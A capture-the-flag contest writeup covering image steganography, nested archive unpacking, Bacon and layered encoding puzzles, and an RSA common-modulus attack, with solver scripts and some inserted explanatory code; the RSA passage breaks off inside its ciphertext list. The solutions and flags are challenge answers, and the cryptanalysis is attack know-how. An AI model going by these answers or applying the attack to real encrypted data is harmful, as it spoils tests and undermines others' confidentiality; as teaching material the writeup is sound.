10.0.0.55 Training Contest Writeup

From LB@10.0.0.55

Misc

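0x01 misc100 (image steganography)

First I scanned the file with binwalk, which found nothing unusual.

Then I searched for the JPEG end-of-image marker FFD9 and, as shown in the figure below, saw the PNG format marker IHDR.

So I deleted everything before FFD9 and restored the PNG file header 8950 4e47 0d0a 1a0a, which gave a new image that looks completely white, with no content. Opening it reports an image error, however, which suggested that the width/height and the CRC do not match.

Analyzing the PNG format gives:

CRC = 0x9A768270, width = 0x0320, height = 0x012C

Brute-force the height with the following script: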

# -*- coding: utf-8 -*-
import binascii
import struct

# IHDR chunk type and data as found in the file:
# \x49\x48\x44\x52\x00\x00\x03\x20\x00\x00\x01\x2C\x08\x06\x00\x00\x00
crc32key = 0x9A768270          # CRC stored after the IHDR data
width = b'\x00\x00\x03\x20'
for i in range(256, 65535):
    height = struct.pack('>i', i)
    # The CRC covers the chunk type plus the 13 data bytes
    data = b'\x49\x48\x44\x52' + width + height + b'\x08\x06\x00\x00\x00'
    crc32result = binascii.crc32(data) & 0xffffffff
    if crc32result == crc32key:
        # Print the matching height as hex
        print(''.join('%02X' % c for c in height))

This gives a height of 0x0258; patching it into the file yields flag{python&C_master_can_be_my_girlfriend}.
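The whole procedure above (locate IHDR after the JPEG end marker, restore the PNG signature, check the IHDR CRC, search for the height that satisfies it) as one added example that is not part of the original writeup. The input file is constructed in build_sample() with the width and heights quoted above; its CRC is computed by the sample and is not the challenge's value, and all function names are made up for this example.

```python
import struct
import zlib

PNG_SIG = bytes.fromhex("89504e470d0a1a0a")
JPEG_EOI = b"\xff\xd9"


def chunk(ctype, body):
    """Serialize one PNG chunk: length, type, body, CRC-32 over type + body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_sample(width=0x320, true_height=0x258, shown_height=0x12C):
    """Constructed file: JPEG stub, then a PNG without its signature whose
    IHDR height was lowered after the CRC had been computed."""
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", width, true_height, 8, 6, 0, 0, 0))
    tampered = ihdr[:12] + struct.pack(">I", shown_height) + ihdr[16:]
    pixels = bytes((width * 4 + 1) * true_height)  # all-zero RGBA scanlines
    body = tampered + chunk(b"IDAT", zlib.compress(pixels)) + chunk(b"IEND", b"")
    return b"\xff\xd8" + bytes(32) + JPEG_EOI + body


def carve_png(blob):
    """Return the data following the JPEG end marker with the PNG signature restored."""
    marker = JPEG_EOI + struct.pack(">I", 13) + b"IHDR"
    pos = blob.find(marker)
    if pos < 0:
        raise ValueError("no IHDR chunk directly after a JPEG end marker")
    return PNG_SIG + blob[pos + len(JPEG_EOI):]


def read_ihdr(png):
    """Return (width, height, stored_crc, crc_ok) for the leading IHDR chunk."""
    if not png.startswith(PNG_SIG) or png[12:16] != b"IHDR":
        raise ValueError("not a PNG with a leading IHDR chunk")
    width, height = struct.unpack(">II", png[16:24])
    stored = struct.unpack(">I", png[29:33])[0]
    actual = zlib.crc32(png[12:29]) & 0xFFFFFFFF
    return width, height, stored, stored == actual


def recover_height(png, max_height=0xFFFF):
    """Find the height that makes the stored IHDR CRC valid; None if already valid."""
    _, _, stored, ok = read_ihdr(png)
    if ok:
        return None
    prefix, suffix = png[12:20], png[24:29]  # 'IHDR' + width, 5 trailing bytes
    for h in range(1, max_height + 1):
        if zlib.crc32(prefix + struct.pack(">I", h) + suffix) & 0xFFFFFFFF == stored:
            return h
    raise ValueError("no height matches the stored CRC (width may be altered too)")


def repair(png):
    """Write the recovered height back into the IHDR chunk."""
    h = recover_height(png)
    return png if h is None else png[:20] + struct.pack(">I", h) + png[24:]


if __name__ == "__main__":
    png = carve_png(build_sample())
    print("header says  :", read_ihdr(png))
    print("after repair :", read_ihdr(repair(png)))
```

A viewer that ignores the IHDR CRC would show only the top part of such an image, so a CRC mismatch in IHDR is a cheap indicator that the dimensions were edited.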

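0x02 misc200 (unpacking with Python)

The challenge description makes it clear that the archive has to be unpacked 800 times. The file you are given at the start is in Gzip format, but every one after it is a tar, so for convenience I unpacked once by hand and then let a script do the rest.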

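# -*- coding:utf-8 -*-
__Author__ = "LB@10.0.0.55"
import tarfile

dstPath = ''                      # extract into the current directory

# 800.tar is what the manual gzip step produced
tar = tarfile.open("800.tar", "r")
now = tar.getnames()[0]           # every layer holds a single member
tar.extractall(dstPath)
tar.close()

# Keep unpacking until the extracted member is the file named 'flag'
while now != 'flag':
    tar = tarfile.open(now, "r")
    now = tar.getnames()[0]
    tar.extractall(dstPath)
    tar.close()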

This yields flag{for_i_in_{800..0};do_tar_xzvf_$i;done_&&_cat_flag}
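A variant of the unpacking loop, added here and not part of the original writeup: it peels the layers in memory, lets tarfile detect the gzip layer itself, and checks each member's name and size before reading it, which matters because extractall() on an archive from an unknown source trusts the member paths stored inside it. The nested sample is constructed by make_nested(); the layer names and limits are assumptions of this example.

```python
import io
import tarfile


def make_tar(name, data, mode="w"):
    """Build an in-memory tar ('w') or tar.gz ('w:gz') holding one member."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode=mode) as tar:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def make_nested(payload, layers):
    """Constructed sample: 'flag' wrapped `layers` times, outermost layer gzip."""
    name, data = "flag", payload
    for i in range(layers):
        data = make_tar(name, data, "w:gz" if i == layers - 1 else "w")
        name = str(i)
    return data


def unwrap(data, max_layers=1000, max_member=64 * 1024 * 1024):
    """Peel single-member archives until the member is named 'flag'.

    Nothing is written to disk, so a member name cannot steer a write outside
    the working directory; names and sizes are validated anyway so the same
    checks can guard an on-disk extraction.
    Returns (payload, layers_peeled).
    """
    for layer in range(1, max_layers + 1):
        # "r:*" makes tarfile detect plain tar, gzip, bz2 or xz on its own
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
            members = tar.getmembers()
            if len(members) != 1 or not members[0].isfile():
                raise ValueError("layer %d: expected exactly one regular file" % layer)
            member = members[0]
            if member.name.startswith("/") or ".." in member.name.split("/"):
                raise ValueError("layer %d: unsafe member name %r" % (layer, member.name))
            if member.size > max_member:
                raise ValueError("layer %d: member larger than the limit" % layer)
            data = tar.extractfile(member).read()
        if member.name == "flag":
            return data, layer
    raise ValueError("no 'flag' member within %d layers" % max_layers)


if __name__ == "__main__":
    sample = make_nested(b"flag{constructed_sample}", 6)
    print(unwrap(sample))
```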

Crypto

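0x03 crypto100 (Bacon cipher)

The text starts with "佛曰" ("Buddha says"), so I decoded it on this site: http://keyfc.net/bbs/tools/tudoucode.aspx

That gave JavaScript emoticon code. The consoles of several browsers I tried did not handle it well; in the end I used 360.

The output was a lot of "flag"s (funny). Converting Flag to 1 and flag to 0 gives a string of length 85, a multiple of 5; a hint from my senior M4x told me it is a Bacon cipher, so I converted 1 to a and 0 to b and decoded it.

The script is attached: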

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
import re

alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']

# 26-letter table: every letter has its own 5-symbol code
first_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","babaa","babab","babba","babbb","bbaaa","bbaab"]

# 24-letter table: i/j and u/v share a code
second_cipher = ["aaaaa","aaaab","aaaba","aaabb","aabaa","aabab","aabba","aabbb","abaaa","abaaa","abaab","ababa","ababb","abbaa","abbab","abbba","abbbb","baaaa","baaab","baaba","baabb","baabb","babaa","babab","babba","babbb"]

def encode():
    string = input("please input string to encode:\n")
    e_string1 = ""
    e_string2 = ""
    for index in string:
        for i in range(0,26):
            if index == alphabet[i]:
                e_string1 += first_cipher[i]
                e_string2 += second_cipher[i]
                break
    print("first encode method result is:\n"+e_string1)
    print("second encode method result is:\n"+e_string2)
    return


def decode():
    e_string = input("please input string to decode:\n")
    # Split the ciphertext into groups of five symbols
    e_array = re.findall(".{5}",e_string)
    d_string1 = ""
    d_string2 = ""
    for index in e_array:
        for i in range(0,26):
            if index == first_cipher[i]:
                d_string1 += alphabet[i]
            # A shared code in the second table appends both of its letters
            if index == second_cipher[i]:
                d_string2 += alphabet[i]
    print("first decode method result is:\n"+d_string1)
    print("second decode method result is:\n"+d_string2)
    return


if __name__ == '__main__':
    while True:
        print("\t*******Bacon Encode_Decode System*******")
        print("input should be lowercase,cipher just include a b")
        print("1.encode\n2.decode\n3.exit")
        s_number = input("please input number to choose\n")
        if s_number == "1":
            encode()
            input()
        elif s_number == "2":
            decode()
            input()
        elif s_number == "3":
            break
        else:
            continue

This yields flag{interestingcoding}

0x04 crypto200

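In this challenge the flag is encrypted by passing it through four functions, and each time you are told the index of the function that was applied, so you have to reverse them one by one. The script is attached.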

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
import binascii
import string

# ROT13: swap the first and second halves of the upper- and lowercase alphabets
def rot13(s):
    return s.translate(str.maketrans(
        string.ascii_uppercase[13:] + string.ascii_uppercase[:13] +
        string.ascii_lowercase[13:] + string.ascii_lowercase[:13],
        string.ascii_uppercase + string.ascii_lowercase))

# Undo the base64 layer (whitespace in the decoded text is dropped)
def base64(s):
    return ''.join(binascii.a2b_base64(s).decode().split())

# Undo the hex layer
def hex(s):
    return binascii.unhexlify(s).decode()

# Swap case: uppercase to lowercase, lowercase to uppercase
def upsidedown(s):
    return s.translate(str.maketrans(
        string.ascii_lowercase + string.ascii_uppercase,
        string.ascii_uppercase + string.ascii_lowercase))

flag = open('flag1.txt','r').read()  # try to recover flag

E = (rot13, base64, hex, upsidedown)

# The first character of each layer is the index of the function that undoes it
while flag[0:4] != 'FLAG':
    print(flag[0])
    flag = E[int(flag[0])](flag[1:])

print(flag)
#FLAG{KEEP CLAM AND DECODE!}

0x05 crypto300

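This is the first RSA challenge I have done since getting into CTFs, and abo went and made it this hard....

Put simply, the encryption in this challenge is c = pow( flag , e , n )

c and e are different every time, but n is fixed, and that is the key. Anyone familiar with RSA will recognize this as a common-modulus attack.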
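Why a fixed n with changing e gives the plaintext away, as an added example that is not the author's script: for two samples with gcd(e1, e2) = 1, extended Euclid gives s and t with s*e1 + t*e2 = 1, so c1^s * c2^t = m (mod n) without factoring n. The modulus, exponents and message below are constructed for the demonstration (they are not the challenge's values), and recover() generalizes to a list of samples by skipping pairs whose exponents share a factor.

```python
def egcd(a, b):
    """Extended Euclid: return (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def common_modulus(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 and c2 = m^e2 (mod n) when gcd(e1, e2) == 1."""
    g, s, t = egcd(e1, e2)
    if g != 1:
        raise ValueError("exponents share a factor; this pair only yields m^g")
    # s*e1 + t*e2 == 1, so c1^s * c2^t == m^(s*e1 + t*e2) == m (mod n).
    # One of s, t is negative: pow() then inverts the base mod n
    # (Python 3.8+), which requires gcd(c, n) == 1.
    return pow(c1, s, n) * pow(c2, t, n) % n


def recover(n, pairs):
    """Try every two (e, c) samples until one pair has coprime exponents."""
    for i, (e1, c1) in enumerate(pairs):
        for e2, c2 in pairs[i + 1:]:
            if egcd(e1, e2)[0] == 1:
                m = common_modulus(n, e1, c1, e2, c2)
                return m.to_bytes((m.bit_length() + 7) // 8, "big")
    raise ValueError("no two exponents are coprime")


# Constructed demo values, not taken from the challenge.
N = (2**127 - 1) * (2**521 - 1)      # product of two Mersenne primes
SECRET = b"flag{demo}"
EXPONENTS = [21, 35, 65537]          # gcd(21, 35) = 7, so that pair is skipped


def demo():
    """Encrypt SECRET under each exponent (unpadded RSA) and recover it."""
    m = int.from_bytes(SECRET, "big")
    pairs = [(e, pow(m, e, N)) for e in EXPONENTS]
    return recover(N, pairs)


if __name__ == "__main__":
    print(demo())
```

The recovery works only because the same unpadded message is encrypted under one modulus with different exponents; randomized padding such as OAEP makes the two plaintexts differ and removes the relation.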

The script is as follows:

#!/usr/bin/python
# -*- coding: utf-8 -*-
__Author__ = "LB@10.0.0.55"
from libnum import n2s
import sys   
sys.setrecursionlimit(1000000)
e = [1619455979,
2218655053,
2835180841,
3071798573,
3875439793,
361506967,
1578333451,
2921677883,
3932969143,
364263283,
3513149351,
3517079837,
696665539,
3335742701,
3157525687,
1113728801,
3628966093,
2111846309,
3650543653,
2507103857,
2151201433,
2470127773,
4167499013,
2990751161,
734964331,
3662407867,
2133375229,
4283967859,
3533655011,
1930522169,
1808434097,
786604957]
c = [
198715253333205140309304762885934618229717196308890027603141480980731775107348360929691664611310937503978870900195082805430374783694030256080622016431713424487244772527324022843322914415619245021182421250854444440781360638422051666613839841944782322487338599765894102041338732574012668931813897325660246967869476602808909797162902701210216869359928429288791785452635316367779426533481308013371557355393449986658731108747490355528775172926959308658280174940152832432165736439293418874425734751782857925497662265002591513393372683454767087602379380052747936562618483274958688907439693149445829031530613277130701096166928779898938460841793137793772824993304228003993183930879792632492470483669825399423456797908143494111020418710988346835166212243585055863746810963626606308385913688254166416633006118130890757463652637792926528161963258064305876815498055545713830360972308419832086946998782649756845607923863281939402203454937273620038072346575381808812583095514453536737347381024233365706099989443504975149420539758813461360142987773976973719344200937932368445461807527624932180387123416910068146569630371506530698264164327834638083283167886159722591510801422331956288691109442923649046533833838586468844563801643083794278525900495947,
32615591258153885532872120460212758736134886243634813235838462055254224230156978893837241333503438837560049738811019202053666852131843579969180819135918195670435646218798338878207884486439776440812589158659112670496432433764763703282993219460450070048880305140176623143541011577825923740021624574565959168129714857503384053650796471388783129123266822191328460622571825254797074278766744344449029921455396794262946102099484014268317736955668932589922820688481421252093330569923330793746274040977414382575142010484625274440120609641303636387828213766610186034348128287594747333041518241387255743495671694388224092241334375557960221929639377746330303476364413655641985978548904603860853957255975864881413562849205221262023878345647011166440806961597198047675599204037404256459922199686158595442710782206991869971191718158251760051098349825060204755675763053569921776142673198989292051093877623107211494156101936560510747801392150211993816788481683949289424910933680711155718999443532741102445391520053539886559539610597786096127192494164164228518358927737684861597150859018781114135430259903665470055196431935820328527509699402240720477154140845753960909980044365171108581262312383752579303617377411202139764854951147676135169489302612,
66331348462686153250296695781759893840540082106431060688642166094920963054454386160909285024693708709180659447308811827207322973517069483891841524064568481696886276602110235756792535972640546550591663958788184831942955818775909915874563107859430209106226964836934030904395159115382465970234941199704819769640593762900413821738787593211862509244398013371277195099352481162860270665271654630361508369774348131367993467425030998160169587216157673761775547713241287877763236621619305350738327144779326468027949822827736957625924651892195159587886802300412318572066585449435186835958137427957072632753488064046044798305510056751900532540381984196188284272484703780296921752859005241779484177257625857724661788303985408659574882200738498812640123589414846620878187851627040332985988217857334444229747101116835546587387529058387175918981369630513582381313981025132667377661996347958584608414104277777302587522043029635312231205555223913452993688170151119170674621210807817504509886723589614037415863900123614532263258892855353325308346912459808465192833936139455853486029976809048738520109306380728782094112390477509687496884677499629470529566827202707607848230794504633198690328201945268284346523454710734309082838305207763348401424238509,
164004163446008089666718192137031817359850277255766982325787647037345948365203976798637842311512464863832906111905990623949817253940409986984951112767032808318393752234041361036838124761423267335784301252250962536689187346813831041022690263185374961035003945149175972938252080480270680193265017609290011924525370595009605467668214164663421327613908679225941571789761138475288685059169731989145533584891528093887786774822746317153981394811634900993706425222431188320062252315542545334453105122231156084343442822838892689123465149586724439206092885935318016639894486157345294295148254853574855635676004303932911256592084480039592267380784991320280314496529203522239789775885043400410844243832986484636238813081350124096050697286264946684135121310120035868794250170852281104112576732912335380194647437945159468639523052796880927916652199668921197221184709945108069959143340391045094329297902707017172245831262183585571921493635549944298566190339579746362622700442052234720301103954999391788078836080909862222317350564301530732293346191963249511710072105503974619883584325246801156050757765262314256649373555369425025832209804598674362824927940241242152600281266717285915149400960059865054140490833118788728211569894674181393036838662875,
45947960368739558208097493897625666406633828759236085666167128694351187102101812420798311480694448160784477764614666102960096253523909779612898944660506642548489336785384765426051470250412672234226935918860589884055859767785524582180227176073546719310433965344821800284543451669281085954579291207714656197314046909588738052170283946327337113276958948898063545911683585561861302907298943619147055181740897995047558573871089748979886754257725528392778596105329761947544528644945129354031014613215305127062993261593496058003235713102885070715811321931665088377167055259977970265510670288183138173964424609912356657806070181228625941519268324110771702105106362587314167901665479477518591875398263727739793665536157373778040769289142530185779538757468804210316078378905303751850938985363358903828024860357603965981293337257369461111208473603446991946306037371320307876827740243011775806693028758616187294179449918997202266105617313062057606633200377759983936855402445899061576947808212483912488374175250969994073880803511846693616863973520692005851822171714638819207800641058501427213577483125133760937020028649876466638159277508377195781127462225538527920401092407877686318950049498560362743264958089197976688365662494303276857287168119,
125356092357877706662890375789247889669578918772140188510294251184770437003787488467595002202059712537946931856311779752934636910015638843793172809755851298956301887259898984497441797450426575641649222569223654927347219044685751484661683163573804529741514926672844330121233800053065064457870686352277216580000951594081199590208346872559615281302351288617853830576904062336628369777575347245887385257515011600976082606608983590091188944101135002119771175159086078912498016037595830122306918624403482241196025009087193892418672815641704807998904332180246158221638180467386385083906546337519343203946612180983042890996720084800461839064529501322421729525787193475935973003893884203795548039033099154281414097679288383366574581948757444266682014579917377740918920008627554825802967371974709787606487041345643990465351248803393702066685612265001695946536255545313027715724876193563102061706081745538155698554624740789574796125009177116459349160726360590091750894253928936908870999161241577669952887206482518264382937705646233999248958177908025091623698057409751131183834050213187339506436023005072302566583836809210349652051963901130838447386499120053021545303376505082100284328095159966864528528141555670656237144471817981898233821593892,
113947585190013050204858639968671693506484067336222834050439344412234983918119868168010840734554753728185036261612987848502772644997800059159205207159229423379995979680377447006074354078488350321558466272998181614961796171604718136255658138919021871283869018473826998886825572913312937740189228070864387191038024266885770986448310955555656855480683963556364167374430841444821204671913908252858635013165707240160147743448468631778867705949485724254273925636764403374763294142186064093872368513451761059968338396708399686951542264351568518376151357627488373380798017398608408511197595649889791196154271553115020249999283686802826932918287532157880899468242790662705099105268686730883800943468903974958267639291146598374627529067159039123402736433967730134409673511156624440096009158059377110097327193924987641316945975645260656977347657073468592006953287005071713408262272027904451749297996431138727856073711169242796937956169003357749813924000509885061674144553770081647386376399926223811996841666771949894170172577599193438447379795354140681289148657382143157540998161025008699580737935977205487224784562054202117233338934037374848570382264843757903986774530172104010903127322627994917241441677326799470264604563991487873632326302069,
80942726005728824895215139113781083664968065596375683537740325568270790305771030979949867969906789229629111681235505930148352932691846429820238691119750789922770189770332413311587297774591957339297276565654210664946307066700933111957642953819634082628772905457015617842988864089659612675074789406389532024617344863925192930665318392468183789658736773488242038712642020924560955678195301266308298388738483906824695769718038726429861476138752015103729553608430087736188299144703289939649895950515761300598105216355133561520282622999887606372705298510403505634121779157210198349273610042792916836503579659629319307123979066107694342081265079809795430752656711272311095826048229251480801188222464003350293060931742028851046247734460021990902239121120703336762580663375951558984614980452686667329216303523199509601743326384074459941786246326417937108386541781330566066886872107846942880200988048881633524680894252100758417934873383671789036332801657881546676971187457537916512681046084389834581780466227847451980265245145281895832533992037561457139473816329200369083114323009699037221052530293515624844108347260372993401849388853134122676211888008496411856021147982279818973569279701644160381544518890795806992080917984283873837126824144,
214748964286081035209411922643372327059725202349732347399245534665110970554122029079012633932218861152187326634432399580600269621940592363219574584018740126198736853091958272130277402229456891249531449094309041328811725296966900230831316294155864987505803737938165617599906622174592612149275576096457882836340204208563569762126081791976284395618556916423751000003673566127803559862024141373910377225212084919293025027358977244217142578601147139027270113463263706799566878136269767200198274930527850002155654375104801680834520836169527312439259226300331053451913678015795777404939938748959292457424659588265575850034351369258584740414184475935450540897753794827814119250635493864307724799256088346672846384482393789390288715550615607976872857474156027266279427030848957181405507039387719747982897529551684361468723983162067857797046622598902612792434860014566055707508089514218004436137530364340939803978979078874295280739477326324351701118236437238056552580727475388289553153608271034381372530723135731178949269451634303240511767113670311279951044780493946481740928681929901143828573923743240314176518678925316106072204398109417077086055467208756421034844564398559146179527125581063437361146615823627458558756122599449355201559716459,
241767495277528128900101000486652749275889274487422293823539248676245352452403118843705086804790362558275001263695258044820011116095887088914244354905676648429118435033479697310583629420333669388307208727678293951879971310206270160426330199950975467567756937926106693158186637811943779666758750105778389831356853455644253612370311686441901134864645474622263426284868902791525887618572059585671895947060021234289934249684722783138728198504449574920087015606865813260865753980751094016588431559561045991871494992295494879268157121270671455517042748098276406999454462454573066759845419070775113152069458040205165768555000122302500543039231566711349898790729753864006820332474775641710748209310873554989740340345861102092397037328725277064234954171925856974727577655871542481359705766810482029988204177984705799818799055378721673498470196963079490232257637980742372941622550634835211334846801748998073042254252317222919977848838631986042322872687293310918108856626422549269542154109857312131863286877767950306423659026533581807725394235957119243940800836289110410712850061875964834310808398889960044969086978294257062880851630511114755426539722553035806203297387011231104030171181888527653438030633976961778199162953343526700865027496929,
257714541961324534377184483181330678678033851719678331768515002293324425768734146175670787163377900936012597602325481153550536642559986044528022683810519287646551581731805922639833743871715994936998335959329613459272463658933196307889461290606551161600985202675134102289498798219962888012791247031648652187575001043335860468024202612628969707392671661597833233161593919667199861509442382102919656806077987736515357432320742052537365011107214491559691189433050599444530603391074154959168707082948967319656023205118935932043741421191017979168480048081248829943636741843243023932531267093388674908610789456766016952874442794461343818692035780915021763187145131426997361929114830921748841360074527343348229779141954682901255112635902934641373950219976042580261289414489940213576240104290544546582549426901916698496253079022698373844103622438767327397941926815642036561669728546312770635905334257868002546831925389380820430448690666403575048383615650283104367356008599331604262770418816661730181480718432284734060945494394168802317975174604779739968830616970026722022431879192931747360257655121344286299631744108849501049584548369301052524366425803814979602300567333169813926867117832041220602112126312630614846998281384526636317619412909,
152249616523673944635428579140531226322748190911364730659947231554448302792759165905461069966161487695925998907980796021147130836979302016252972502764580971887924209920025359074898246785467733810569293830398850124137963734004308132535880064054073778119571860176009539916074419969918961562452866463112848908579756633869799228099602378266621428871605624569336448076762877798889460161981269513371081026181922559581851089365263860867731283840262835498961708292504908601338494938544343080404811748388752868815189914087451719439944825419603628172205728717815378943874330622590435728574302733479328956934548803393266224358585130938195813317420478884586085609569474366402736149851941234240360275687122407054824215210807957032337427099025515370710666328408012041952757287235209496355444773656513614356525235025617398345798673805910780738340609957030127753371119975015410335999833913421796508144765254231359960355335432584291461066445329245736770065098761428216201281556690702076055428744344663697130322997858325934632044792031112417300122270216892692796363243327158672806252176738131619643525149266446681926753397993479994682822505999284810623387480486519656976350650053999001483603731774709540642044035868906426973762559839540670123648543321,
141885175017596305423500627645131575107786339430294645841534346393744970928547706148692598324774017276497208526670340110305600721376723243759252119199493174404588674152780412046411847521117800376368723498110209103411734829959471461413055468278849190880112033989214651317000032448566674630626798721680519404551470132164277463548332432127995584544884538825517140077397392086480903363569224142336996118730340350793968901023298056769525908004725165666875205057477819210713900168509758312779119574187306917568836150259971671505034524945960774159873730041165848998020306035458187413591835371279885988071087098065297253004014665792577814202292314106976221968792123914849966925326898180409125168387653055780850416783533388233794007206639924286508797719626199431224927173654819775635953363464347773437746211996773537308908812131219174505723379744294194604879171275955187982294896604822813307573007969106429840953270923696288671417674740665787604320134500882817682915062705221505532573463342311382309534511561119967273903762793292599949047123883106545864209213649853055775133470488753273747454692389699907818349846963686548006747272385678923090963702315374097599149288799035849189173538312615281590629524521735004123625275574683625257365982950,
84154887167663005564971781415759129131513858873266567263971478334826569906221816174499427438971791043203525474107296940206645812827609501080077255776567097532601998222050222148875378315854239048285144354965586440242520651397385647071959123975187982843234896331888071927552848904030360907011381338160421237078943629057451763949415151878243303312304391203521112830919050144693526351437402537315225585873983762377201070929715691206445183693561482420051400633076275020902523275446788011537262658326370350329119901078250330319218306184596621175065928588508868824102921884476165091160034096460299286154804217951151277564843695469142637818554254256136570700260353532588068560351375083518146438604538140378764050328633359886305506182537529136644867444717294397769407135355914142273651714101824922684567272429747662199568360433925137690726609600645635069518716837677156365887471244560124937152921479266520981831171952445727967566859213080826731388277694313996215356614344861161561916245990536687813179770116264707607047706265252468015484026195230528861464541729666902845284512495437306686898930223807983372129124542966125267141190292960089874990660191717704379851606294904470331435767235538293577922264523225637347689613509384255979791360328,
43055389645867477740739762219909717374008269061992587411227265348272388255749447180898051894820943724210765969852917478151709123919031197606763700822911593332251336820714196671920583693814086249584859041854277902573466436173027214554104290378462905100242892219394275533364666633602052047102375720514970222150140139000553769724412829526852464960929759188588751478464948388214841144095407422134552848930519820740902265441058958761380729756230183603969122778078738907961741909986257001829656399667355771459698511700536882279771089231822480723389262394354239417286522217825183211907921271269570560916522825496913680637173082670943738806325312558783781498239610980612503797072443469055008386663918663661425577342738124440147047973869745514096049151900127257965977246083283415040150114481770180292936219148181123964193073638615475870576701595250826690449247467453221879162608139855844190496319950953492864185640791968347838147106631307491855318809632587021819663942460606838296456987993010551501045897162435160998263122908197877464603213354510075978439509735779899968819938139403623408447867417188142815972772570731054570709025534770324415491896847680853280545722024225400812335839453618710312986137796093716534638332665783690053427565890,
300805093836775269687714503886981915047331069660583214592135776267153412860251701079014552949783015839994026725023945901193233727494210624818589847117536581710999780071379534892743515738612273915688354944651397406101711475051159370069791141899039713571959927605829292021618060760425597424540809999329444942512985990339176894237187132557571289556409102232853113375803550228683847087545839451041477658068909491612228696189919798922378874844769455077179800633860439931278246881321165479258496794490429805697196396398450535601405494300488051331171555842840985215614426735146395132410178484258687147636026156930025265764469768343393258010859496045917596198198115591415776149562040844700469706016570169733699363944167465350085127155184256404522483032691958571671728720863715635573475764348424981882707260910475502490345840937305158588731592680874307201487280234247426374006926927495825609714729756496731145678785460958862155753763832580790222717294512610179338310209465192019766121895084746597197481498308301770473709743958725196324730702041215569698219469796537186707814504900463205554828332215496060575292208125755751799206476791179940980890987519389524580753100591571821932319834517909828317799968182139456552228828118462241699682538215,
138315967799082319490296445952129246745563179189418354508841677229638259890233330923186435844871957862174167359229919039284304544801637241759134317927339498384323728740308391869882282641100164329833112544490531610162853039874075612367241941406708341643149155367734408705163357366835880193333024302260818331560724033336055415313740928715878224709282116887472441624628455603706235225795697510446794073701843132129403117265913442933436437027396730217511334527115106351270221401529179746478711184961651191253221699727142061801178430664040958771707494460181732232337953415828546198691707033313772894128162875464480105242199754920648127850370370003988060285111321590722417148423613545768902518122775532627057780140400783945009598520415975692393863347875587203844837496905934893503282323465118792962950189582770676792194101789778784292361424387343556640230203756522907496993072562753301134799557826032747054444287227100981033407580735717533650106269017913747941641876933259644822710522956983523717743814407698037421434020594767531390788894167855043325427253386448600253651599622076865992719336952996107347634527539570972074843886754329867171479781703702122686943181443610338727508255752277512516232067794521891591677203255878922590577353237,
233740741422103742385226886459472228257996327027200669233270229106694027300701973346021518474124745761420868645554975634347879683081785394721627695806659008928588139601813725687736133617243782809822596609914471421975648172306632894839761855967254363315375860181372798621867969637847935040991294541858402634237436676163462454024718224361512590244490522510528351778678346480402700382951123489117058006415772227637662064238950401445829597912585254301483855231554525892957401374245610620677843488579854377287384955459155069670703658051366458535713960439698347589006293972863845151913950434010522997164682113968952739054333618973511388158499125413572347339627042448286533263735202607800594477371262391885531210293044458197057524870357809728965699557382442675742298388001066404618489767251762157063568216350911330727475357473470623152086840758107385045257051648933616583481918254777353698564998862424758771401098688047151778063076790017466242066120712941066695402894021205835285013857338788028207389085253954073408554260403570973999806463657514170152348437729921947241986792747213414965359649966031309824090239867787947757540119014443189340701989844531311336614633354048249887870465299326511294175524764597920051931417047441603395093018730,
246719308520592920627179375352296892607680361443207528582582900762591061017974501868249196255624185244762399613671497549510936678927431914506367776509748817150579947091205723368545513742677870756111193095047255664855494883360146877395221609808360458422687252861069883311996346132372214020580594073309706578347503453196587092079136915964841230896137199650671638626176358849088414232492164299383500442885916251151073773948628843699243501954315568852309019787480212501753256664039981010518461028444336723439914906185060367524386546373667062142554924661637662889011728218902877432094787295339629030233821634494188419259269221673775348647066501174147709661479053932470613830638333644003572493313902736377595229262980073089519984432526465095278951230709076535730810997982093855902192543131555776749780036503208592070644540863433216189194449905863206000199298066699985225844781917772916059953902032900266549296226218867181670691338561484883575783381435525400710798233031365862795975646472599146414893847307530718013144263371927926831223871310153770086986628181751937606310418604742376058398134081723746654217631467890046688045928848019811885058274421241538036886400931421413404017493319900316044601954955303082294070896183674478977452117911,
236863212635899268903633391586192270281951404241719588100757586338939683662410080886308389789799677882451459489379049555637101929982486219286840856011920759656664168453863660294112292140838071766123673388992374383357275899207482318162595199866106874715386272208058403404274947340040493774946699254494078404435872070028495218945003096610859714423679025973424980511909296006604216006426909938802897596503312879672009150267131683390667424558114743694206626916260377603381906604849719318137499978797915632863997101675974326123323778492441347560169221617789817259580562728951447026765030318737288742675440350231882794749429834572275730182229309065713144401277110458972279318974236960532146982756393346063677110976795751213734037890386502942731572774272132376799787538870043053995033487015977641960731237296882704784058070134826109233192466203053918513775569191750609389729081103755988056143301137056795307917959693835438965971850434751702673748249826884718080134171022598394470504154822498919006347796730121120318612862366487897229260784579108714962151674232483170289175177377875379175343808063061650527670954592834476574490049808732500320171923286863419078067056882615659678515158055456567037992682772757835766697037290256319066632554220,
